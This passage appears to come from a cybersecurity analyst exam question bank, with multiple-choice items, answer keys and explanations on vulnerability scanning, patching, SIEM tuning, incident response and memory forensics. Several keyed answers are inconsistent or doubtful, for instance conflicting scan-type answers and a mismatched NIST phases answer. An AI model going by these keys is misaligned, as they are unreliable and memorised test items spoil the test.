Option A is wrong because a broken SIEM parser would cause missing or malformed logs, not the generation of an authentication event using a deception credential; the detection itself is valid. Option B is wrong because a scheduled password rotation would change the credential's password, but the deception credential is a static honeytoken not subject to rotation, and its use would still be malicious regardless of rotation status.

790
MCQeasy

Which of the following vulnerability scanning tools is open source and commonly used for network vulnerability assessment?

A.Nessus
B.Qualys
C.Rapid7 InsightVM
D.OpenVAS
AnswerD

OpenVAS is open source and widely used.

Why this answer

OpenVAS is a well-known open-source vulnerability scanner.

791
MCQmedium

A security analyst at a financial institution is responsible for vulnerability management. The company has a policy that all critical vulnerabilities must be remediated within 72 hours. The weekly vulnerability scan identifies a critical vulnerability on a file server that hosts sensitive customer data. The vulnerability is a remote code execution in the operating system. The server is running a legacy OS that is no longer supported by the vendor. The system owner states that the application on the server cannot be migrated to a newer OS for at least six months. The server cannot be taken offline because it is used by the compliance team for daily audits. Which of the following should the analyst recommend to best address the risk?

A.Remove the server from the network immediately.
B.Implement compensating controls such as network segmentation and host-based firewall rules.
C.Accept the risk and document the exception.
D.Apply a custom patch developed by the manufacturer.
AnswerB

Reduces risk while awaiting migration.

Why this answer

Option B is correct because when a critical vulnerability cannot be patched due to legacy OS constraints, compensating controls are the best approach to reduce risk. Network segmentation isolates the server from untrusted hosts, and host-based firewall rules restrict inbound/outbound traffic to only necessary ports and IPs, mitigating the remote code execution vector without taking the server offline.

Exam trap

CompTIA often tests the concept that compensating controls are the appropriate response when patching is impossible and business continuity is critical, tricking candidates into choosing risk acceptance (C) without considering that compensating controls must be implemented first.

How to eliminate wrong answers

Option A is wrong because immediately removing the server from the network would halt compliance audits, violating business requirements and potentially causing regulatory issues; it is an extreme measure not aligned with risk acceptance or compensating controls. Option C is wrong because accepting risk and documenting an exception without implementing any technical safeguards ignores the policy requiring remediation within 72 hours and leaves sensitive customer data exposed to remote code execution. Option D is wrong because the OS is no longer supported by the vendor, so no custom patch is available; applying an unsupported or unofficial patch could introduce instability or security flaws and is not a recommended practice.

792
MCQhard

An analyst is investigating a memory dump of a compromised system and finds a process that appears to be running inside another process's memory space, with no associated executable on disk. Which technique best describes this finding?

A.Process hollowing
B.Reflective DLL injection
C.API hooking
D.DLL injection
AnswerA

Correct. Process hollowing replaces the legitimate process's code with malicious code without writing a file to disk.

Why this answer

Process hollowing involves creating a legitimate process in a suspended state, replacing its memory with malicious code, and resuming it. The absence of an on-disk executable is a key indicator.

793
MCQeasy

An analyst needs to identify which process on a Windows system is making outbound connections to the internet. Which tool should be used?

A.netstat -an
B.Task Manager
C.Resource Monitor
D.Performance Monitor
AnswerC

Displays network activity per process.

Why this answer

Resource Monitor (resmon.exe) provides a real-time view of network activity, including which processes are making outbound TCP and UDP connections, along with the remote addresses and ports. Unlike netstat, it directly associates network connections with specific process names and allows filtering by process, making it the most efficient tool for identifying the exact process responsible for outbound internet traffic.

Exam trap

CompTIA often tests the distinction between tools that show aggregate network usage (Task Manager) versus those that show per-connection process mapping (Resource Monitor), leading candidates to choose Task Manager because they associate it with network activity without realizing it lacks connection-level detail.

How to eliminate wrong answers

Option A is wrong because netstat -an shows all active connections and listening ports but does not display the process name or PID by default; without the -b or -o flags, it cannot identify which process owns a connection. Option B is wrong because Task Manager's default view shows CPU, memory, disk, and network utilization per process, but it does not list individual outbound connections or remote addresses, only aggregate network usage. Option D is wrong because Performance Monitor is designed for long-term performance logging and analysis of system counters, not for real-time identification of specific process-to-remote-address connections.

794
MCQeasy

Which of the following is a key performance indicator (KPI) for measuring the efficiency of patch management?

A.Mean time to respond (MTTR)
B.Number of open vulnerabilities
C.Phishing simulation click rate
D.Patch SLA compliance %
AnswerD

Correct. It directly measures adherence to patching deadlines.

Why this answer

Patch SLA compliance percentage measures how often patches are applied within the defined service level agreement, indicating the effectiveness of patch management processes.

795
MCQhard

A container workload unexpectedly starts a shell, mounts the host filesystem, and attempts outbound connections to an unknown IP. Which telemetry is MOST useful? In the root-cause analysis phase, Which finding would most directly explain the activity?

A.Only user password age reports
B.Only physical datacenter access logs
C.Container runtime events, Kubernetes audit logs, and network flow from the pod
D.Only monthly vulnerability scan summaries
AnswerC

Runtime, orchestration, and network telemetry together show process execution, privilege context, and external communication.

Why this answer

Container runtime events (e.g., `docker events` or CRI-O logs) capture the unexpected shell execution and host filesystem mount. Kubernetes audit logs record the API calls that initiated the pod, revealing the attacker's initial access vector. Network flow logs from the pod (e.g., via Calico or Cilium) show the outbound connections to the unknown IP, linking the lateral movement to the compromised container.

Together, these three telemetry sources provide the complete chain of events needed for root-cause analysis.

Exam trap

The CS0-003 exam often tests the misconception that a single log source (e.g., only network flows) is sufficient for root-cause analysis, when in reality a combination of container runtime, Kubernetes audit, and network telemetry is required to reconstruct the full attack chain.

How to eliminate wrong answers

Option A is wrong because user password age reports are irrelevant to container workload activity; they track local user account password expiration policies and cannot capture runtime events, mounts, or network flows inside a pod. Option B is wrong because physical datacenter access logs record who entered the facility, not what happens inside a container; they provide no visibility into shell execution, filesystem mounts, or outbound connections from a workload.

796
MCQeasy

An organization wants to perform vulnerability scanning on internal servers that contain sensitive data. The scanning team is concerned about causing service disruptions. Which type of scan should be recommended to minimize risk?

A.Agent-based scan
B.Non-credentialed scan
C.Credentialed scan with safe checks enabled
D.External scan from the internet
AnswerB

Correct. Non-credentialed scans are less likely to impact services.

Why this answer

Non-credentialed scans are less intrusive and less likely to cause service disruptions because they do not log into the target systems.

797
Multi-Selecteasy

Which TWO of the following are best practices for secure log management? (Choose TWO)

Select 2 answers
A.Enable log encryption in transit and at rest
B.Implement log aggregation from multiple sources
C.Disable logging on non-critical systems to save space
D.Store logs on the same server for easy access
E.Use a common log format for all sources
AnswersA, B

Encryption protects log integrity and confidentiality.

Why this answer

Option A is correct because encrypting logs in transit (e.g., using TLS/SSL for syslog over TCP 6514) and at rest (e.g., AES-256 encryption on the storage volume) ensures confidentiality and integrity, preventing unauthorized access or tampering. This aligns with security frameworks like NIST SP 800-92 and PCI DSS requirements for protecting log data.

Exam trap

CompTIA often tests the misconception that 'common log format' is a security best practice, but it is actually an operational convenience; the trap is confusing operational efficiency with security controls.

798
MCQeasy

A security analyst is using OpenVAS to perform a vulnerability scan of an internal network. The scan completes and generates a report listing several vulnerabilities. What is the next step in the vulnerability lifecycle?

A.Prioritization
B.Verification
C.Reporting
D.Remediation
AnswerA

Vulnerabilities must be prioritized before deciding which to remediate.

Why this answer

After discovery (scanning), the next step is prioritization of vulnerabilities based on risk, exploitability, and business impact.

799
Multi-Selectmedium

Which TWO of the following are key phases of the incident response process as defined by NIST?

Select 2 answers
A.Recovery
B.Containment
C.Preparation
D.Eradication
E.Post-Incident Activity
AnswersC, E

One of the four main phases.

Why this answer

The NIST SP 800-61 Rev. 2 incident response lifecycle consists of four key phases: Preparation, Detection & Analysis, Containment/Eradication/Recovery, and Post-Incident Activity. Option C (Preparation) is correct because it is the foundational phase where policies, tools (e.g., SIEM, EDR), and communication plans are established before any incident occurs. Option E (Post-Incident Activity) is correct because it includes lessons learned, evidence retention, and report generation to improve future response efforts.

Exam trap

The CS0-003 exam often tests the distinction between the four key NIST phases and the sub-steps within the third phase, causing candidates to mistakenly select Containment, Eradication, or Recovery as separate key phases instead of recognizing they are combined.

800
MCQmedium

A scan of Windows servers reports few findings, but the scanner used no credentials. The security manager suspects missing patch data. What should be changed? For control selection, Which control best addresses the stated weakness without hiding risk?

A.Run authenticated scans using least-privilege scanner credentials
B.Increase only the port range
C.Disable host firewalls permanently
D.Trust the unauthenticated result as complete
AnswerA

Authenticated scanning gives the scanner access to installed software and patch state, improving accuracy.

Why this answer

Unauthenticated scans only enumerate open ports and services visible without credentials, missing the patch status of installed software because they cannot query the Windows registry or WMI for installed updates. Running authenticated scans with least-privilege credentials allows the scanner to log into each target and retrieve detailed patch data via the Windows Update Agent API or registry keys, revealing missing patches that were previously invisible. This directly addresses the security manager's suspicion of missing patch data without introducing unnecessary risk.

Exam trap

The CS0-003 exam often tests the misconception that increasing scan depth (e.g., port range or intensity) compensates for lack of authentication, but the trap here is that patch data is only accessible through authenticated access, not by broader network scanning.

How to eliminate wrong answers

Option B is wrong because increasing only the port range expands the network-layer scan but still cannot access patch-level information without authentication; it only finds more open ports, not missing patches. Option C is wrong because permanently disabling host firewalls exposes the servers to network-based attacks and does not enable the scanner to retrieve patch data—authentication is required, not firewall bypass. Option D is wrong because trusting the unauthenticated result as complete ignores the fundamental limitation that unauthenticated scans cannot assess patch status, leaving the organization vulnerable to known exploits that the scanner missed.

801
MCQhard

A security analyst is reviewing SIEM alerts and sees multiple failed logon events from a single external IP address across several user accounts within two minutes. The source IP is from a known malicious geolocation. What type of attack is most likely occurring?

A.Password spraying attack
B.Distributed denial-of-service (DDoS) attack
C.Brute-force attack
D.Pass-the-hash attack
AnswerC

Multiple failed logon attempts from one IP across accounts indicates a brute-force attack.

Why this answer

The scenario describes multiple failed logon attempts from a single external IP against several user accounts within a short time window. This pattern is characteristic of a brute-force attack, where an attacker systematically tries common or guessed passwords across multiple accounts to gain unauthorized access. The single source IP and rapid sequence of failures distinguish it from a password spraying attack, which spreads attempts across many accounts slowly to avoid lockout thresholds.

Exam trap

The trap here is confusing a brute-force attack with a password spraying attack; CompTIA often tests this by emphasizing the speed and source IP concentration versus the slow, distributed nature of password spraying.

How to eliminate wrong answers

Option A is wrong because a password spraying attack uses a small number of common passwords against many accounts over an extended period to evade account lockout, not rapid attempts from one IP against multiple accounts. Option B is wrong because a DDoS attack aims to overwhelm a service with traffic to cause denial of service, not to authenticate via logon events. Option D is wrong because a pass-the-hash attack involves capturing and reusing NTLM or Kerberos hashes to authenticate without knowing the plaintext password, which does not generate failed logon events from a single external IP.

802
Multi-Selecthard

An analyst is investigating a potential data exfiltration incident. The analyst observes repeated HTTPS connections to a cloud storage provider from a server that does not normally use that service. Which three additional artifacts would strengthen the case for exfiltration?

Select 3 answers
A.The data transfer volume is significantly higher than normal for that server
B.The connections are occurring during non-business hours
C.The connections are made to a known malicious IP
D.The connections occur during business hours only
E.The server is using a non-standard port for HTTPS (e.g., 8080)
AnswersA, B, E

Unusually high data volume is a strong indicator.

Why this answer

Large outbound data volume, connections outside business hours, and use of non-standard ports (e.g., 443 for https but custom port for tunneling) are classic exfiltration indicators.

803
MCQhard

A company policy requires that all security incidents be reported to management within one hour of detection. An analyst discovers a low-severity incident (a single malware download attempt blocked by antivirus) at 4:55 PM on a Friday. The analyst is about to leave for the weekend. What should the analyst do?

A.Document the incident in the ticketing system and report it the next business day.
B.Report the incident immediately according to policy, even if it means staying late.
C.Report the incident via email and ignore it until Monday.
D.Wait until Monday morning to report, as it is low severity.
AnswerB

Complying with policy ensures timely reporting, which is mandatory.

Why this answer

Option B is correct because the company policy explicitly requires reporting all security incidents within one hour of detection, regardless of severity. The analyst must report the incident immediately, even if it means staying late, as policy compliance is mandatory and low-severity incidents still represent a security event that could indicate broader compromise or be part of a larger attack chain. Delaying reporting violates the policy and could lead to disciplinary action or missed escalation windows.

Exam trap

The trap here is that candidates assume low-severity incidents can be deferred or handled casually, but Cisco tests strict adherence to policy timelines regardless of severity, emphasizing that all incidents must be reported within the specified window.

How to eliminate wrong answers

Option A is wrong because documenting the incident in the ticketing system but delaying the report until the next business day violates the one-hour reporting policy, and low severity does not exempt the analyst from timely notification. Option C is wrong because reporting via email and then ignoring the incident until Monday fails to ensure the incident is properly tracked, escalated, or remediated, and it does not constitute a complete report within the required timeframe. Option D is wrong because waiting until Monday morning to report, even for a low-severity incident, directly contradicts the policy that mandates reporting within one hour of detection, and severity does not override the reporting requirement.

804
MCQhard

Based on the exhibit, which vulnerability should the analyst prioritize for remediation?

A.Squid http proxy 3.5.20
B.OpenSSH 7.4
C.Apache httpd 2.4.6
D.MySQL 5.5.62
AnswerD

MySQL 5.5.62 is end-of-life and has multiple critical remote code execution vulnerabilities.

Why this answer

MySQL 5.5.62 is end-of-life (EOL) and no longer receives security patches, making it vulnerable to known exploits such as CVE-2016-6662 (privilege escalation via crafted my.cnf) and CVE-2016-6663 (privilege escalation via REPAIR TABLE). The analyst should prioritize this because the lack of vendor support means any discovered vulnerability will remain unpatched, posing a critical risk to data confidentiality and integrity.

Exam trap

CompTIA often tests the concept that end-of-life software with no vendor support is a higher priority than older but still-supported versions, even if the latter have known CVEs, because unsupported software will never receive patches for future vulnerabilities.

How to eliminate wrong answers

Option A is wrong because Squid http proxy 3.5.20 is not the highest priority; while it may have vulnerabilities, it is not EOL and typically has a lower CVSS score compared to an unsupported database. Option B is wrong because OpenSSH 7.4, though older, is still supported in many enterprise distributions (e.g., RHEL 7 backports security fixes) and does not represent an immediate EOL risk like MySQL 5.5.62. Option C is wrong because Apache httpd 2.4.6 is also still supported in some long-term support distributions (e.g., RHEL 7) and does not carry the same criticality as an unsupported database server that stores sensitive data.

805
MCQmedium

A server team needs to fix an OpenSSL vulnerability across Linux hosts. What should the technical remediation section include? If the primary audience is business service owner, which content choice is most appropriate?

A.Only estimated financial loss
B.Only a red/yellow/green chart
C.Affected assets, package versions, patch commands or vendor guidance, validation method, and rollback notes
D.Only the CVE headline
AnswerC

Technical teams need precise, actionable remediation steps and a way to confirm success. The report should be tuned to business service owner while preserving factual accuracy.

Why this answer

Option C is correct because a technical remediation section must provide actionable steps for the server team to fix the OpenSSL vulnerability. It includes affected assets (specific Linux hosts), package versions (e.g., openssl-1.1.1k), patch commands (e.g., 'yum update openssl' or 'apt-get upgrade openssl'), vendor guidance (e.g., Red Hat or Ubuntu advisories), validation method (e.g., 'openssl version' or 'openssl version -a'), and rollback notes (e.g., 'yum history undo' or snapshot restore). For a business service owner, this content is most appropriate because it translates technical actions into clear, auditable steps that demonstrate risk mitigation and operational planning.

Exam trap

The CS0-003 exam often tests the distinction between a technical remediation section (actionable steps for engineers) and a business impact summary (for executives), so candidates mistakenly pick a single metric or chart instead of the comprehensive, executable plan required for the server team.

How to eliminate wrong answers

Option A is wrong because only estimated financial loss is a business impact metric, not a technical remediation step; it fails to provide the server team with any actionable commands or procedures to fix the OpenSSL vulnerability. Option B is wrong because only a red/yellow/green chart is a status summary or risk heatmap, not a remediation plan; it lacks the specific package versions, patch commands, and validation methods needed to execute the fix. Option D is wrong because only the CVE headline (e.g., CVE-2022-3786) identifies the vulnerability but gives no technical steps to remediate it; the server team needs patch commands and rollback procedures, not just a reference number.

806
MCQeasy

A security analyst needs to communicate the business impact of a newly discovered critical vulnerability to the executive team. Which of the following is the BEST approach?

A.Send the raw vulnerability scan report.
B.Explain the vulnerability in layman's terms and estimate potential financial loss.
C.Recommend immediate patching without further context.
D.Provide a detailed CVSS score and exploit code.
AnswerB

This translates technical risk to business risk.

Why this answer

Translating technical risk into business terms (financial, reputational, regulatory) helps executives understand the impact and make informed decisions.

807
MCQmedium

A UEBA rule flags a user authenticating from London and Singapore within 12 minutes, followed by a mailbox forwarding rule creation. What should the analyst investigate first? In the detection engineering phase, Which detection or tuning approach would reduce noise without losing the signal?

A.Only DHCP logs from the London office
B.The organisation's public DNS zone file
C.Only the user's browser cache
D.Sign-in logs, MFA result, device details, and mailbox audit events
AnswerD

Impossible travel plus forwarding rule creation is a strong account-compromise pattern; identity and mailbox audit data confirm whether the activity is malicious.

Why this answer

Option D is correct because the scenario describes a potential account takeover or lateral movement, where an impossible travel event (logins from London and Singapore within 12 minutes) is followed by a suspicious mailbox forwarding rule. The analyst must first verify the sign-in logs for authentication details, MFA results to check if the MFA was bypassed or prompted, device details to identify if a known or managed device was used, and mailbox audit events to confirm the forwarding rule creation and its origin. These combined data sources provide the most direct evidence to determine if the activity is malicious or a false positive.

Exam trap

CompTIA often tests the misconception that network-level logs (like DHCP or DNS) are sufficient for investigating user account anomalies, but the correct approach requires focusing on authentication and audit logs that directly capture user identity and actions.

How to eliminate wrong answers

Option A is wrong because DHCP logs only show IP address assignments and cannot provide authentication context, MFA results, or mailbox audit events needed to investigate the impossible travel and forwarding rule. Option B is wrong because the organization's public DNS zone file contains domain name mappings and is irrelevant to user authentication events or mailbox rule changes; it would not help trace the user's activity. Option C is wrong because the user's browser cache is a client-side artifact that may show browsing history but cannot reveal server-side authentication logs, MFA challenges, or mailbox audit events, and it is not a reliable source for enterprise security investigations.

808
MCQeasy

While supporting a hybrid workforce, a company wants to test whether legal, PR, IT, and executives understand their roles during a ransomware incident without touching production systems. What exercise is best? During post-incident improvement, which decision is most defensible? which evidence should guide the decision?

A.Tabletop exercise using a realistic ransomware scenario
B.Purchasing a new SIEM without testing procedures
C.Annual password reset only
D.Full destructive malware detonation in production
AnswerA

Tabletops validate decision paths and communication without operational disruption. In post-incident improvement, responders need action that reduces risk while preserving the investigation record.

Why this answer

A tabletop exercise (option A) is the correct choice because it simulates a realistic ransomware scenario in a discussion-based format, allowing legal, PR, IT, and executives to validate their roles and decision-making processes without impacting production systems. This aligns with NIST SP 800-61r2 guidelines for testing incident response plans through low-impact, discussion-driven exercises, ensuring cross-functional coordination without risking data integrity or availability.

Exam trap

The CS0-003 exam often tests the distinction between 'testing the plan' (tabletop) and 'testing the technology' (SIEM purchase or password reset), where candidates mistakenly choose a technical solution like a new SIEM because they focus on detection tools rather than validating human roles and decision-making processes.

How to eliminate wrong answers

Option B is wrong because purchasing a new SIEM without testing procedures introduces untested technology into the environment, which can create false positives/negatives and operational gaps, and does not validate human roles during an incident. Option C is wrong because an annual password reset only addresses a single authentication control and does not test the multi-team response, communication, or decision-making required during a ransomware incident, leaving critical gaps in legal, PR, and executive coordination.

809
Drag & Dropmedium

Arrange the steps for a typical penetration testing engagement in the correct order.

Drag steps to the numbered slots on the right, or tap a step then tap a slot.

Steps
Order

Why this order

Penetration testing follows a structured methodology: recon, scanning, exploitation, post-exploitation, and reporting.

810
MCQeasy

A security analyst is analyzing a suspicious file using static analysis. The analyst wants to identify imported functions to determine the file's capabilities. Which tool or technique is BEST suited for this task?

A.Extracting strings from the file
B.Submitting the file to VirusTotal
C.Running the file in a sandbox like Cuckoo
D.Analyzing the PE header's import table
AnswerD

The import table lists all DLLs and functions the file uses, providing insight into its behavior.

Why this answer

PE header analysis includes examining the import table to see which Windows API functions the executable calls, revealing its potential behavior.

811
MCQhard

During an incident, the SOC team identifies indicators of compromise (IoCs) that may affect partners. According to best practices, what should the analyst do first?

A.Follow the incident response communication plan
B.Wait until the incident is fully resolved
C.Post the IoCs on a public threat sharing platform
D.Directly notify all affected partners
AnswerA

The plan outlines steps for internal and external communication.

Why this answer

An incident response plan should define communication procedures; typically, the team should escalate internally to leadership who can authorize external notifications.

812
MCQeasy

A security analyst is configuring a vulnerability scanner to evaluate the security posture of internal servers. Which type of scan provides the most accurate assessment of missing patches?

A.Network-based scan without credentials
B.Non-credentialed external scan
C.Credentialed internal scan
D.Agent-based scan
AnswerC

Credentialed scans have access to system patch information.

Why this answer

Credentialed scans authenticate to the target OS and can query patch levels directly, yielding more accurate results than uncredentialed scans.

813
MCQhard

An analyst examines a memory dump from a compromised host and finds that 'svchost.exe' is executing code from a memory region that is not backed by any executable file. What technique is most likely being used?

A.Reflective DLL injection
B.API hooking
C.Process hollowing
D.DLL injection
AnswerC

Process hollowing creates a process in a suspended state and replaces its memory with malicious code, matching the finding of code without a file backing.

Why this answer

Hollowing involves replacing a legitimate process's memory with malicious code, leaving no corresponding file on disk.

814
Multi-Selecthard

A threat hunter suspects data exfiltration over HTTPS from a database server. Which data sources are most useful? (Choose two.)

Select 2 answers
A.Database audit logs showing queried objects and accounts
B.Printer toner status
C.Building temperature logs
D.NetFlow or proxy logs showing destination, volume, and timing
AnswersA, D

Database logs reveal whether sensitive data was accessed before transfer.

Why this answer

Database audit logs record which objects (tables, columns) were queried and by which accounts, directly revealing unauthorized access or unusual data retrieval patterns that could indicate exfiltration. NetFlow or proxy logs capture destination IP addresses, data volumes, and timing of HTTPS sessions, allowing the hunter to spot large or anomalous outbound transfers to suspicious hosts, even though the payload is encrypted.

Exam trap

The CS0-003 exam often tests the misconception that encrypted traffic (HTTPS) is completely opaque, leading candidates to overlook metadata sources like NetFlow or proxy logs that can reveal exfiltration patterns without decryption.

815
MCQhard

A scanner flags TLS 1.0 on a server, but the service owner says TLS 1.0 is disabled. What is the BEST validation method? For business prioritization, Which recommendation gives the best risk-based order of work?

A.Manually test the service with a TLS client or scanner profile that negotiates protocol versions
B.Delete the server from the scan scope
C.Change the severity to informational automatically
D.Close the finding because the owner disagrees
AnswerA

Direct protocol validation determines whether TLS 1.0 is actually accepted.

Why this answer

Option A is correct because the best validation method is to independently verify the server's TLS configuration by manually testing with a TLS client (e.g., OpenSSL s_client) or a scanner profile that explicitly attempts to negotiate TLS 1.0. This eliminates false positives from automated scanners that may rely on banner grabbing or outdated fingerprints, and directly confirms whether the service accepts TLS 1.0 handshakes at the protocol level.

Exam trap

The trap here is that candidates assume the scanner's automated result is always accurate and choose to change severity or remove the finding, rather than understanding that validation through independent protocol negotiation is the required step before any risk-based prioritization.

How to eliminate wrong answers

Option B is wrong because deleting the server from the scan scope ignores the potential vulnerability entirely, failing to validate the finding and leaving the organization exposed if TLS 1.0 is actually enabled. Option C is wrong because automatically changing the severity to informational without validation could mask a real risk; severity should be based on verified technical evidence, not automated assumptions, and this bypasses proper risk assessment.

816
MCQeasy

During a vulnerability scan of an internal web server, the scanner reports a critical vulnerability with a CVSS score of 9.8. The analyst reviews the finding and determines that the vulnerability is mitigated by a Web Application Firewall (WAF) deployed in front of the server. What should the analyst do with this finding?

A.Mark the finding as a false positive and close it.
B.Immediately patch the server to remove the vulnerability.
C.Document the compensating control and track the finding until patched.
D.Increase the scan frequency to detect if the vulnerability changes.
AnswerC

Correct. The vulnerability is real but mitigated; it should be tracked with the compensating control noted.

Why this answer

The vulnerability is effectively mitigated by the compensating control (WAF), so it should be documented as such and tracked until the patch is applied.

817
MCQhard

A scanner flags TLS 1.0 on a server, but the service owner says TLS 1.0 is disabled. What is the BEST validation method? For control selection, Which control best addresses the stated weakness without hiding risk?

A.Close the finding because the owner disagrees
B.Change the severity to informational automatically
C.Delete the server from the scan scope
D.Manually test the service with a TLS client or scanner profile that negotiates protocol versions
AnswerD

Direct protocol validation determines whether TLS 1.0 is actually accepted.

Why this answer

Option D is correct because the best validation method is to manually test the service using a TLS client (e.g., OpenSSL s_client) or a scanner profile that explicitly attempts to negotiate TLS 1.0. This directly verifies whether the server truly rejects TLS 1.0 handshakes, eliminating false positives from scanner misconfiguration or version negotiation quirks. Relying on the owner's assertion or altering the finding without technical proof would violate vulnerability management best practices.

Exam trap

CompTIA often tests the misconception that a service owner's claim or a scanner's default severity should override manual technical verification, tempting candidates to choose administrative actions (A, B, C) instead of the rigorous validation step (D).

How to eliminate wrong answers

Option A is wrong because closing a finding solely because the owner disagrees ignores the need for technical validation and hides potential risk. Option B is wrong because automatically changing severity to informational without testing conceals the actual risk level and violates the principle of risk transparency. Option C is wrong because deleting the server from scan scope removes visibility entirely, which is an extreme and inappropriate response that does not address the underlying protocol weakness.

818
Multi-Selectmedium

A Security Operations Center (SOC) analyst is tuning a SIEM rule to reduce false positives. Which three of the following are valid approaches to improve the signal-to-noise ratio of a detection rule? (Choose three.)

Select 3 answers
.Adding a whitelist for known benign source IP addresses or user accounts.
.Increasing the severity level of the alert to ensure faster response.
.Adjusting the time window for event correlation to reduce overlapping alerts.
.Removing the rule entirely to eliminate all associated noise.
.Refining the event frequency threshold to require a higher number of occurrences.
.Adding additional event sources to broaden the scope of detection.

Why this answer

Adding a whitelist for known benign source IP addresses or user accounts is a valid approach because it directly reduces false positives by excluding traffic that is known to be safe from triggering the rule. This improves the signal-to-noise ratio by ensuring that only truly suspicious activity generates alerts, without altering the detection logic itself.

Exam trap

CompTIA often tests the misconception that increasing severity or adding more data sources improves detection quality, when in fact these actions can degrade the signal-to-noise ratio by amplifying noise or misdirecting analyst attention.

819
MCQhard

A team says a critical vulnerability was patched. What should the vulnerability manager require before closure? For validation, Which action should be taken before closing or downgrading the finding?

A.Create a duplicate ticket for every asset
B.A retest showing the vulnerable condition is no longer present
C.Close it immediately based on the email
D.Wait one year before testing
AnswerB

Closure should be based on validation evidence, not only a remediation claim.

Why this answer

Option B is correct because the vulnerability manager must obtain objective evidence that the fix was successfully applied and the vulnerability is no longer exploitable. A retest—typically performed via authenticated scanning or manual verification—confirms the absence of the vulnerable condition, aligning with the remediation validation phase in the vulnerability management lifecycle. Closing based solely on a team's email (Option C) violates the principle of verify, not trust, and could leave residual risk unaddressed.

Exam trap

The CS0-003 exam often tests the principle that vulnerability closure requires independent verification (retest) rather than accepting a team's assertion, and the trap here is that candidates may think an email confirmation is sufficient because it comes from the responsible team, ignoring the need for objective evidence.

How to eliminate wrong answers

Option A is wrong because creating a duplicate ticket for every asset introduces unnecessary administrative overhead and does not provide any validation that the patch was applied or effective; it merely duplicates work without confirming remediation. Option C is wrong because closing a finding based solely on an email from the team bypasses the required verification step; the vulnerability manager must independently confirm the fix through a retest or equivalent evidence, as the team's claim could be mistaken or incomplete.

820
MCQmedium

A vulnerability scanner reports that an internal web application is vulnerable to SQL injection. The development team says they fixed it by input sanitization. Which of the following should the analyst do FIRST?

A.Update the vulnerability report
B.Perform a manual penetration test
C.Rescan the application to confirm remediation
D.Review the code changes
AnswerC

Rescanning provides immediate evidence of whether the vulnerability is resolved.

Why this answer

Option C is correct because the first step after a claimed fix is to verify the remediation by rescanning the application with the same vulnerability scanner. This provides objective evidence that the SQL injection vector is no longer exploitable, confirming the input sanitization was effective before any further actions are taken.

Exam trap

CompTIA often tests the misconception that reviewing code changes is the immediate next step, but the correct first action is always to verify the fix with the same scanning tool to maintain an objective audit trail.

How to eliminate wrong answers

Option A is wrong because updating the vulnerability report without verifying the fix could propagate false information and lead to compliance issues. Option B is wrong because performing a manual penetration test is a valid next step but should come after automated rescanning to confirm the basic fix, as it is more resource-intensive and may miss simple residual issues. Option D is wrong because reviewing code changes is a development task and not the analyst's first action; the analyst should first confirm the fix via scanning to maintain an objective security posture.

821
MCQeasy

A CI pipeline blocks a container image because the base layer contains a critical OpenSSL CVE. The application team says the vulnerable binary is not used. What is the BEST next step? For validation, Which action should be taken before closing or downgrading the finding?

A.Ship the image and document nothing
B.Validate exploitability and rebuild from a patched base image where feasible
C.Only rename the image tag
D.Ignore all base-image vulnerabilities
AnswerB

Container findings should consider reachability, but rebuilding from a patched base reduces inherited risk.

Why this answer

Option B is correct because the best next step is to validate whether the vulnerable OpenSSL binary is actually exploitable in the container's runtime context (e.g., it may be a statically linked unused library or a dead code path). If the binary is truly unused, the team should still rebuild from a patched base image where feasible to maintain a clean supply chain and avoid false-positive fatigue; if it is used, the vulnerability must be remediated. This balances security rigor with operational pragmatism, aligning with vulnerability management best practices for containerized environments.

Exam trap

CompTIA often tests the misconception that a vulnerability can be safely ignored simply because the application team claims the binary is unused, without requiring validation or a documented risk acceptance process.

How to eliminate wrong answers

Option A is wrong because shipping the image without documentation violates security policy and audit requirements, leaving no record of the risk acceptance decision. Option C is wrong because renaming the image tag does not change the vulnerable base layer; the CVE remains present and exploitable if the binary is used. Option D is wrong because ignoring all base-image vulnerabilities is negligent; even if this specific CVE is not exploitable, other vulnerabilities in the same base layer could be active, and blanket ignoring undermines the CI pipeline's security gates.

822
MCQmedium

A deception credential placed in a file share is used to authenticate to a server. No legitimate user should know the credential. What does this most likely indicate? In the detection engineering phase, Which detection or tuning approach would reduce noise without losing the signal?

A.Credential access or lateral movement activity that warrants high-priority investigation
B.The file share requires more storage capacity
C.A scheduled password rotation completed successfully
D.The SIEM parser is always broken
AnswerA

Use of a honey credential is a high-fidelity signal because legitimate workflows should not touch it.

Why this answer

A deception credential is a deliberately planted fake credential (e.g., a honey token) that no legitimate user should ever use. When it is used to authenticate to a server, it indicates that an attacker has discovered the credential and is attempting to use it for lateral movement or credential access. This is a high-fidelity alert that warrants immediate investigation because it directly signals unauthorized activity.

Exam trap

The CS0-003 exam often tests the concept that deception credentials are not used by legitimate users or automated processes, so any authentication with them is malicious; the trap is confusing this with routine administrative actions like password rotation or storage issues.

How to eliminate wrong answers

Option B is wrong because the file share requiring more storage capacity is a capacity management issue, not a security detection concern; it would not generate an authentication event. Option C is wrong because a scheduled password rotation would use legitimate, known credentials and would not involve a deception credential that no legitimate user should know; password rotation tools do not authenticate with honey tokens.

823
MCQhard

A vulnerability report has 900 findings. One medium CVSS vulnerability is listed in CISA KEV and has high EPSS; several high CVSS issues are not exploitable in the environment. What should the analyst recommend? For stakeholder management, Which documentation or approval is required to keep the programme defensible?

A.Remediate alphabetically by CVE ID
B.Remediate only vulnerabilities with vendor logos in the report
C.Prioritize the KEV/high-EPSS issue after confirming asset exposure
D.Always sort only by CVSS base score
AnswerC

Known exploitation and likelihood can outweigh base CVSS in risk-based prioritization.

Why this answer

Option C is correct because CISA KEV and high EPSS indicate active exploitation in the wild, making the medium CVSS vulnerability a higher operational priority than non-exploitable high CVSS issues. The analyst must first confirm asset exposure to ensure the vulnerability actually affects the environment before recommending remediation. This aligns with risk-based vulnerability management (RBVM) principles, which prioritize exploitability and threat intelligence over CVSS base score alone.

Exam trap

The CS0-003 exam often tests the misconception that CVSS base score alone determines priority, but the trap here is that a medium CVSS vulnerability with KEV/high EPSS is more urgent than high CVSS issues that are not exploitable in the environment.

How to eliminate wrong answers

Option A is wrong because sorting alphabetically by CVE ID ignores all risk factors (CVSS, KEV, EPSS, exploitability) and would waste resources on low-priority findings. Option B is wrong because vendor logos in a report do not correlate with exploitability or business risk; a vulnerability may lack a vendor logo yet still be actively exploited and critical to remediate.

824
MCQmedium

During a forensic analysis, an analyst needs to collect data in order of volatility. Which of the following represents the correct order from most volatile to least volatile?

A.Disk, swap, RAM, CPU registers, logs
B.CPU registers, RAM, swap, disk, logs
C.RAM, CPU registers, swap, disk, logs
